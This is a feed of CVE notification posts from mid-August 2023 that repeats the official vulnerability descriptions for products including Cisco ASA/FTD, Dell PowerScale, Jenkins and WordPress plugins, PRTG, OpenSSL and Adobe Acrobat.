🚨 CVE-2021-1493A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause a buffer overflow on an affected system. The vulnerability is due to insufficient boundary checks for specific data that is provided to the web services interface of an affected system. An attacker could exploit this vulnerability by sending a malicious HTTP request. A successful exploit could allow the attacker to cause a buffer overflow condition on the affected system, which could disclose data fragments or cause the device to reload, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-08-16 19:58:25 |
🚨 CVE-2021-1476A vulnerability in the CLI of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) of an affected device. The vulnerability is due to insufficient input validation of commands that are supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input for specific commands. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges. To exploit this vulnerability, an attacker must have valid administrator-level credentials.🎖@cveNotify |
|
| 2023-08-16 19:58:24 |
🚨 CVE-2021-1488A vulnerability in the upgrade process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to inject commands that could be executed with root privileges on the underlying operating system (OS). This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by uploading a crafted upgrade package file to an affected device. A successful exploit could allow the attacker to inject commands that could be executed with root privileges on the underlying OS.🎖@cveNotify |
|
| 2023-08-16 19:58:20 |
🚨 CVE-2023-20006A vulnerability in the hardware-based SSL/TLS cryptography functionality of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series Appliances could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to an implementation error within the cryptographic functions for SSL/TLS traffic processing when they are offloaded to the hardware. An attacker could exploit this vulnerability by sending a crafted stream of SSL/TLS traffic to an affected device. A successful exploit could allow the attacker to cause an unexpected error in the hardware-based cryptography engine, which could cause the device to reload.🎖@cveNotify |
|
| 2023-08-16 19:58:19 |
🚨 CVE-2022-20826A vulnerability in the secure boot implementation of Cisco Secure Firewalls 3100 Series that are running Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated attacker with physical access to the device to bypass the secure boot functionality. This vulnerability is due to a logic error in the boot process. An attacker could exploit this vulnerability by injecting malicious code into a specific memory location during the boot process of an affected device. A successful exploit could allow the attacker to execute persistent code at boot time and break the chain of trust.🎖@cveNotify |
|
| 2023-08-16 19:58:15 |
🚨 CVE-2022-20947A vulnerability in dynamic access policies (DAP) functionality of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to improper processing of HostScan data received from the Posture (HostScan) module. An attacker could exploit this vulnerability by sending crafted HostScan data to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-dap-dos-GhYZBxDU ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-dap-dos-GhYZBxDU"] This advisory is part of the November 2022 release of the Cisco ASA, FTD, and FMC Security Advisory Bundled publication.🎖@cveNotify |
|
| 2023-08-16 19:58:14 |
🚨 CVE-2022-20795A vulnerability in the implementation of the Datagram TLS (DTLS) protocol in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause high CPU utilization, resulting in a denial of service (DoS) condition. This vulnerability is due to suboptimal processing that occurs when establishing a DTLS tunnel as part of an AnyConnect SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted DTLS traffic to an affected device. A successful exploit could allow the attacker to exhaust resources on the affected VPN headend device. This could cause existing DTLS tunnels to stop passing traffic and prevent new DTLS tunnels from establishing, resulting in a DoS condition. Note: When the attack traffic stops, the device recovers gracefully.🎖@cveNotify |
|
| 2023-08-16 16:58:33 |
🚨 CVE-2023-32487Dell PowerScale OneFS, 8.2.x - 9.5.0.x, contains an elevation of privilege vulnerability. A low privileged local attacker could potentially exploit this vulnerability, leading to denial of service, code execution and information disclosure. 🎖@cveNotify |
|
| 2023-08-16 16:58:32 |
🚨 CVE-2023-32486Dell PowerScale OneFS 9.5.x version contain a privilege escalation vulnerability. A low privilege local attacker could potentially exploit this vulnerability, leading to escalation of privileges.🎖@cveNotify |
|
| 2023-08-16 16:58:31 |
🚨 CVE-2023-32492Dell PowerScale OneFS 9.5.0.x contains an incorrect default permissions vulnerability. A low-privileged local attacker could potentially exploit this vulnerability, leading to information disclosure or allowing to modify files.🎖@cveNotify |
|
| 2023-08-16 16:58:27 |
🚨 CVE-2023-32493Dell PowerScale OneFS, 9.5.0.x, contains a protection mechanism bypass vulnerability. An unprivileged, remote attacker could potentially exploit this vulnerability, leading to denial of service, information disclosure and remote execution.🎖@cveNotify |
|
| 2023-08-16 16:58:26 |
🚨 CVE-2020-26037Directory Traversal vulnerability in Server functionalty in Even Balance Punkbuster version 1.902 before 1.905 allows remote attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-16 16:58:25 |
🚨 CVE-2023-32494Dell PowerScale OneFS, 8.0.x-9.5.x, contains an improper handling of insufficient privileges vulnerability. A local privileged attacker could potentially exploit this vulnerability, leading to elevation of privilege and affect in compliance mode also.🎖@cveNotify |
|
| 2023-08-16 16:58:24 |
🚨 CVE-2023-38904A Cross Site Scripting (XSS) vulnerability in Netlify CMS v.2.10.192 allows a remote attacker to execute arbitrary code via a crafted payload to the body parameter of the new post function.🎖@cveNotify |
|
| 2023-08-16 16:58:20 |
🚨 CVE-2023-40338Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier displays an error message that includes an absolute path of a log file when attempting to access the Scan Organization Folder Log if no logs are available, exposing information about the Jenkins controller file system.🎖@cveNotify |
|
| 2023-08-16 16:58:19 |
🚨 CVE-2023-40342Jenkins Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents.🎖@cveNotify |
|
| 2023-08-16 16:58:18 |
🚨 CVE-2023-40343Jenkins Tuleap Authentication Plugin 1.1.20 and earlier uses a non-constant time comparison function when validating an authentication token allowing attackers to use statistical methods to obtain a valid authentication token.🎖@cveNotify |
|
| 2023-08-16 16:58:14 |
🚨 CVE-2023-40344A missing permission check in Jenkins Delphix Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-16 16:58:13 |
🚨 CVE-2023-40346Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs.🎖@cveNotify |
|
| 2023-08-16 16:58:12 |
🚨 CVE-2023-40347Jenkins Maven Artifact ChoiceListProvider (Nexus) Plugin 1.14 and earlier does not set the appropriate context for credentials lookup, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to.🎖@cveNotify |
|
| 2023-08-16 16:58:11 |
🚨 CVE-2023-40348The webhook endpoint in Jenkins Gogs Plugin 1.0.15 and earlier provides unauthenticated attackers information about the existence of jobs in its output.🎖@cveNotify |
|
| 2023-08-16 14:58:35 |
🚨 CVE-2023-0551The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments🎖@cveNotify |
|
| 2023-08-16 14:58:34 |
🚨 CVE-2023-0579The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.🎖@cveNotify |
|
| 2023-08-16 14:58:33 |
🚨 CVE-2023-1465The WP EasyPay WordPress plugin before 4.1 does not escape some generated URLs before outputting them back in pages, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-16 14:58:32 |
🚨 CVE-2023-1977The Booking Manager WordPress plugin before 2.0.29 does not validate URLs input in it's admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the sites internal network.🎖@cveNotify |
|
| 2023-08-16 14:58:28 |
🚨 CVE-2023-2122The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitise and escape the iowd_tabs_active parameter before rendering it in the plugin admin panel, leading to a reflected Cross-Site Scripting vulnerability, allowing an attacker to trick a logged in admin to execute arbitrary javascript by clicking a link.🎖@cveNotify |
|
| 2023-08-16 14:58:27 |
🚨 CVE-2023-2225The SEO ALert WordPress plugin through 1.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-08-16 14:58:26 |
🚨 CVE-2023-2254The Ko-fi Button WordPress plugin before 1.3.3 does not properly some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup), and we consider it a low risk.🎖@cveNotify |
|
| 2023-08-16 14:58:25 |
🚨 CVE-2023-2271The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack🎖@cveNotify |
|
| 2023-08-16 14:58:22 |
🚨 CVE-2023-2272The Tiempo.com WordPress plugin through 0.1.2 does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-16 14:58:21 |
🚨 CVE-2022-4782The ClickFunnels WordPress plugin through 3.1.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-08-16 14:58:20 |
🚨 CVE-2023-31448A path traversal vulnerability was identified in the HL7 sensor in PRTG 23.2.84.1566 and earlier versions where an authenticated user with write permissions could trick the HL7 sensor into behaving differently for existing files and non-existing files. This made it possible to traverse paths, allowing the sensor to execute files outside the designated custom sensors folder. The severity of this vulnerability is medium and received a score of 4.7 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L🎖@cveNotify |
|
| 2023-08-16 14:58:19 |
🚨 CVE-2023-31449A path traversal vulnerability was identified in the WMI Custom sensor in PRTG 23.2.84.1566 and earlier versions where an authenticated user with write permissions could trick the WMI Custom sensor into behaving differently for existing files and non-existing files. This made it possible to traverse paths, allowing the sensor to execute files outside the designated custom sensors folder. The severity of this vulnerability is medium and received a score of 4.7 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L🎖@cveNotify |
|
| 2023-08-16 14:58:15 |
🚨 CVE-2023-31452A cross-site request forgery (CSRF) token bypass was identified in PRTG 23.2.84.1566 and earlier versions that allows remote attackers to perform actions with the permissions of a victim user, provided the victim user has an active session and is induced to trigger the malicious request. This could force PRTG to execute different actions, such as creating new users. The severity of this vulnerability is high and received a score of 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H🎖@cveNotify |
|
| 2023-08-16 14:58:14 |
🚨 CVE-2023-32782A command injection was identified in PRTG 23.2.84.1566 and earlier versions in the Dicom C-ECHO sensor where an authenticated user with write permissions could abuse the debug option to write new files that could potentially get executed by the EXE/Script sensor. The severity of this vulnerability is high and received a score of 7.2 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H🎖@cveNotify |
|
| 2023-08-16 14:58:13 |
🚨 CVE-2023-37581Insufficient input validation and sanitation in Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.2 and you should disable Roller's File Upload feature.?🎖@cveNotify |
|
| 2023-08-16 11:58:25 |
🚨 CVE-2023-37581Insufficient input validation and sanitation in Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.2 and you should disable Roller's File Upload feature.?🎖@cveNotify |
|
| 2023-08-16 11:58:24 |
🚨 CVE-2023-3632Use of Hard-coded Cryptographic Key vulnerability in Sifir Bes Education and Informatics Kunduz - Homework Helper App allows Authentication Abuse, Authentication Bypass.This issue affects Kunduz - Homework Helper App: before 6.2.3.🎖@cveNotify |
|
| 2023-08-16 11:58:20 |
🚨 CVE-2023-3817Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. After fixingCVE-2023-3446 it was discovered that a large q parameter value can also triggeran overly long computation during some of these checks. A correct q value,if present, cannot be larger than the modulus p parameter, thus it isunnecessary to perform these checks if q is larger than p.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulnerable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the "-check" option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-08-16 11:58:19 |
🚨 CVE-2023-3446Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. One of thosechecks confirms that the modulus ('p' parameter) is not too large. Trying to usea very large modulus is slow and OpenSSL will not normally use a modulus whichis over 10,000 bits in length.However the DH_check() function checks numerous aspects of the key or parametersthat have been supplied. Some of those checks use the supplied modulus valueeven if it has already been found to be too large.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulernable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the '-check' option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-08-16 11:58:18 |
🚨 CVE-2023-2330The Caldera Forms Google Sheets Connector WordPress plugin before 1.3 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack🎖@cveNotify |
|
| 2023-08-16 11:58:14 |
🚨 CVE-2023-2886Missing Origin Validation in WebSockets vulnerability in CBOT Chatbot allows Content Spoofing Via Application API Manipulation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-08-16 11:58:13 |
🚨 CVE-2023-3958The WP Remote Users Sync plugin for WordPress is vulnerable to Server Side Request Forgery via the 'notify_ping_remote' AJAX function in versions up to, and including, 1.2.12. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This was partially patched in version 1.2.12 and fully patched in version 1.2.13.🎖@cveNotify |
|
| 2023-08-16 11:58:12 |
🚨 CVE-2023-4374The WP Remote Users Sync plugin for WordPress is vulnerable to unauthorized access of data and addition of data due to a missing capability check on the 'refresh_logs_async' functions in versions up to, and including, 1.2.11. This makes it possible for authenticated attackers with subscriber privileges or above, to view logs.🎖@cveNotify |
|
| 2023-08-16 05:58:27 |
🚨 CVE-2023-32003`fs.mkdtemp()` and `fs.mkdtempSync()` can be used to bypass the permission model check using a path traversal attack. This flaw arises from a missing check in the fs.mkdtemp() API and the impact is a malicious actor could create an arbitrary directory.This vulnerability affects all users using the experimental permission model in Node.js 20.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-08-16 05:58:22 |
🚨 CVE-2023-32006The use of `module.constructor.createRequire()` can bypass the policy mechanism and require modules outside of the policy.json definition for a given module.This vulnerability affects all users using the experimental policy mechanism in all active release lines: 16.x, 18.x, and, 20.x.Please note that at the time this CVE was issued, the policy is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-08-16 05:58:21 |
🚨 CVE-2023-0871XXE injection in /rtc/post/ endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to XML external entity (XXE) injection, which can be used for instance to force Horizon to make arbitrary HTTP requests to internal and external services. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter and Moshe Apelbaum for reporting this issue.🎖@cveNotify |
|
| 2023-08-16 05:58:20 |
🚨 CVE-2022-40982Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-16 05:58:19 |
🚨 CVE-2022-41804Unauthorized error injection in Intel(R) SGX or Intel(R) TDX for some Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-16 05:58:15 |
🚨 CVE-2023-23908Improper access control in some 3rd Generation Intel(R) Xeon(R) Scalable processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-16 05:58:14 |
🚨 CVE-2023-20569A side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled?address, potentially leading to information disclosure.🎖@cveNotify |
|
| 2023-08-16 05:58:13 |
🚨 CVE-2023-27561runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.🎖@cveNotify |
|
| 2023-08-16 05:58:12 |
🚨 CVE-2019-19921runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)🎖@cveNotify |
|
| 2023-08-16 01:58:14 |
🚨 CVE-2023-20560Insufficient validation of the IOCTL (Input Output Control) input buffer in AMD Ryzen™ Master may allow a privileged attacker to provide a null value potentially resulting in a Windows crash leading to denial of service.🎖@cveNotify |
|
| 2023-08-16 01:58:13 |
🚨 CVE-2023-39849Pikachu v1.0 was discovered to contain a SQL injection vulnerability via the $username parameter at \inc\function.php.🎖@cveNotify |
|
| 2023-08-16 01:58:12 |
🚨 CVE-2023-39851webchess v1.0 was discovered to contain a SQL injection vulnerability via the $playerID parameter at mainmenu.php.🎖@cveNotify |
|
| 2023-08-15 22:58:25 |
🚨 CVE-2023-32563An unauthenticated attacker could achieve the code execution through a RemoteControl server.🎖@cveNotify |
|
| 2023-08-15 22:58:24 |
🚨 CVE-2023-32564An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remove code execution.🎖@cveNotify |
|
| 2023-08-15 22:58:23 |
🚨 CVE-2023-4282The EmbedPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'admin_post_remove' and 'remove_private_data' functions in versions up to, and including, 3.8.2. This makes it possible for authenticated attackers with subscriber privileges or above, to delete plugin settings.🎖@cveNotify |
|
| 2023-08-15 22:58:22 |
🚨 CVE-2023-32562An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.3.x and below that could allow an attacker to achieve a remove code execution. Fixed in version 6.4.1.🎖@cveNotify |
|
| 2023-08-15 22:58:21 |
🚨 CVE-2023-38401A vulnerability in the HPE Aruba Networking Virtual Intranet Access (VIA) client could allow local users to elevate privileges. Successful exploitation could allow execution of arbitrary code with NT AUTHORITY\SYSTEM privileges on the operating system.🎖@cveNotify |
|
| 2023-08-15 22:58:17 |
🚨 CVE-2023-38402A vulnerability in the HPE Aruba Networking Virtual Intranet Access (VIA) client could allow malicious users to overwrite arbitrary files as NT AUTHORITY\SYSTEM. A successful exploit could allow these malicious users to create a Denial-of-Service (DoS) condition affecting the Microsoft Windows operating System boot process.🎖@cveNotify |
|
| 2023-08-15 22:58:15 |
🚨 CVE-2023-38862An issue in COMFAST CF-XR11 v.2.7.2 allows an attacker to execute arbitrary code via the destination parameter of sub_431F64 function in bin/webmgnt.🎖@cveNotify |
|
| 2023-08-15 22:58:14 |
🚨 CVE-2023-38863An issue in COMFAST CF-XR11 v.2.7.2 allows an attacker to execute arbitrary code via the ifname and mac parameters in the sub_410074 function at bin/webmgnt.🎖@cveNotify |
|
| 2023-08-15 22:58:13 |
🚨 CVE-2023-38865COMFAST CF-XR11 V2.7.2 has a command injection vulnerability detected at function sub_4143F0. Attackers can send POST request messages to /usr/bin/webmgnt and inject commands into parameter timestr.🎖@cveNotify |
|
| 2023-08-15 20:58:28 |
🚨 CVE-2023-4345Broadcom RAID Controller web interface is vulnerable client-side control bypass leads to unauthorized data access for low privileged user🎖@cveNotify |
|
| 2023-08-15 20:58:25 |
🚨 CVE-2023-38401A vulnerability in the HPE Aruba Networking Virtual Intranet Access (VIA) client could allow local users to elevate privileges. Successful exploitation could allow execution of arbitrary code with NT AUTHORITY\SYSTEM privileges on the operating system.🎖@cveNotify |
|
| 2023-08-15 20:58:24 |
🚨 CVE-2023-38861An issue in Wavlink WL_WNJ575A3 v.R75A3_V1410_220513 allows a remote attacker to execute arbitrary code via username parameter of the set_sys_adm function in adm.cgi.🎖@cveNotify |
|
| 2023-08-15 20:58:23 |
🚨 CVE-2023-38863An issue in COMFAST CF-XR11 v.2.7.2 allows an attacker to execute arbitrary code via the ifname and mac parameters in the sub_410074 function at bin/webmgnt.🎖@cveNotify |
|
| 2023-08-15 20:58:19 |
🚨 CVE-2023-4323Broadcom RAID Controller web interface is vulnerable to improper session management of active sessions on Gateway setup🎖@cveNotify |
|
| 2023-08-15 20:58:18 |
🚨 CVE-2023-4326Broadcom RAID Controller web interface is vulnerable has an insecure default TLS configuration that supports obsolete SHA1-based ciphersuites🎖@cveNotify |
|
| 2023-08-15 20:58:14 |
🚨 CVE-2023-4328Broadcom RAID Controller web interface is vulnerable to exposure of sensitive data and the keys used for encryption are accessible to any local user on Linux🎖@cveNotify |
|
| 2023-08-15 20:58:13 |
🚨 CVE-2023-4330Broadcom RAID Controller web interface is vulnerable Denial of Service can be caused by an authenticated user to the REST API Interface🎖@cveNotify |
|
| 2023-08-15 20:58:12 |
🚨 CVE-2023-4331Broadcom RAID Controller web interface is vulnerable has an insecure default TLS configuration that support obsolete and vulnerable TLS protocols🎖@cveNotify |
|
| 2023-08-15 18:58:28 |
🚨 CVE-2023-32781An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760. Due to command-line parameter injection and an undocumented debug feature flag, an attacker can utilize the HL7 sensor to write arbitrary data to the disk. This can be utilized to write a custom EXE(.bat) sensor, that will then run. This primitive gives remote code execution.🎖@cveNotify |
|
| 2023-08-15 18:58:27 |
🚨 CVE-2023-31450An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760 x64. To exploit the vulnerability, a authenticated user can create a SQL Sensor. When creating this sensor, the user can set the SQL message that should be sent from the PRTG device. This input parameter contains a path traversal vulnerability that allows an attacker to choose arbitrary files from the system. They will be transmitted over the internet to the attacker's machine.🎖@cveNotify |
|
| 2023-08-15 18:58:23 |
🚨 CVE-2023-29303Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 18:58:22 |
🚨 CVE-2023-38233Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 18:58:21 |
🚨 CVE-2023-38234Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 18:58:17 |
🚨 CVE-2023-38236Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 18:58:16 |
🚨 CVE-2023-38238Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by a Use-After-Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 18:58:15 |
🚨 CVE-2023-38239Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-08-15 17:58:47 |
🚨 CVE-2023-39212Untrusted search path in Zoom Rooms for Windows before version 5.15.5 may allow an authenticated user to enable a denial of service via local access.🎖@cveNotify |
|
| 2023-08-15 17:58:45 |
🚨 CVE-2019-1714A vulnerability in the implementation of Security Assertion Markup Language (SAML) 2.0 Single Sign-On (SSO) for Clientless SSL VPN (WebVPN) and AnyConnect Remote Access VPN in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to successfully establish a VPN session to an affected device. The vulnerability is due to improper credential management when using NT LAN Manager (NTLM) or basic authentication. An attacker could exploit this vulnerability by opening a VPN session to an affected device after another VPN user has successfully authenticated to the affected device via SAML SSO. A successful exploit could allow the attacker to connect to secured networks behind the affected device.🎖@cveNotify |
|
| 2023-08-15 17:58:44 |
🚨 CVE-2019-1687A vulnerability in the TCP proxy functionality for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to restart unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to an error in TCP-based packet inspection, which could cause the TCP packet to have an invalid Layer 2 (L2)-formatted header. An attacker could exploit this vulnerability by sending a crafted TCP packet sequence to the targeted device. A successful exploit could allow the attacker to cause a DoS condition.🎖@cveNotify |
|
| 2023-08-15 17:58:43 |
🚨 CVE-2019-1701Multiple vulnerabilities in the WebVPN service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the WebVPN portal of an affected device. The vulnerabilities exist because the software insufficiently validates user-supplied input on an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information. An attacker would need administrator privileges on the device to exploit these vulnerabilities.🎖@cveNotify |
|
| 2023-08-15 17:58:41 |
🚨 CVE-2019-1708A vulnerability in the Internet Key Exchange Version 2 Mobility and Multihoming Protocol (MOBIKE) feature for the Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition. The vulnerability is due to the incorrect processing of certain MOBIKE packets. An attacker could exploit this vulnerability by sending crafted MOBIKE packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition. The MOBIKE feature is supported only for IPv4 addresses.🎖@cveNotify |
|
| 2023-08-15 17:58:40 |
🚨 CVE-2019-1706A vulnerability in the software cryptography module of the Cisco Adaptive Security Virtual Appliance (ASAv) and Firepower 2100 Series running Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause an unexpected reload of the device that results in a denial of service (DoS) condition. The vulnerability is due to a logic error with how the software cryptography module handles IPsec sessions. An attacker could exploit this vulnerability by creating and sending traffic in a high number of IPsec sessions through the targeted device. A successful exploit could cause the device to reload and result in a DoS condition.🎖@cveNotify |
|
| 2023-08-15 17:58:39 |
🚨 CVE-2019-1705A vulnerability in the remote access VPN session manager of Cisco Adaptive Security Appliance (ASA) Software could allow a unauthenticated, remote attacker to cause a denial of service (DoS) condition on the remote access VPN services. The vulnerability is due to an issue with the remote access VPN session manager. An attacker could exploit this vulnerability by requesting an excessive number of remote access VPN sessions. An exploit could allow the attacker to cause a DoS condition.🎖@cveNotify |
|
